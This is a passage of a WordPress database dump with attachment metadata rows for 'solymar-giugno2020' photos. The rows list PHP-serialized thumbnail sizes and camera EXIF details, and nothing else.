233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0095-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592999659\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"35\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22181,1181,'_wp_attached_file','2020/10/solymar-giugno2020-0093-1.jpg'),(22182,1181,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0093-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0093-1-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0093-1-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0093-1-830x1245.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:1245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-230x345.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-350x525.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0093-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"7.1\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592999469\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.01\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22183,1182,'_wp_attached_file','2020/10/solymar-giugno2020-0122.jpg'),(22184,1182,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0122.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0122-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0122-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0122-830x1245.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:1245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-230x345.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-350x525.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0122-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1593001202\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"62\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22185,1183,'_wp_attached_file','2020/10/solymar-giugno2020-0024.jpg'),(22186,1183,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0024.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0024-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0024-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"18\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592991446\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22187,1184,'_wp_attached_file','2020/10/solymar-giugno2020-0025.jpg'),(22188,1184,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0025.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0025-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0025-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992033\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22189,1185,'_wp_attached_file','2020/10/solymar-giugno2020-0027-1.jpg'),(22190,1185,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0027-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0027-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0027-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992180\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22191,1186,'_wp_attached_file','2020/10/solymar-giugno2020-0028-1.jpg'),(22192,1186,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0028-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0028-1-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0028-1-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0028-1-830x1245.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:1245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-230x345.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-350x525.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0028-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992151\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:7:\"0.00625\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22193,1187,'_wp_attached_file','2020/10/solymar-giugno2020-0026.jpg'),(22194,1187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0026.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0026-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0026-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i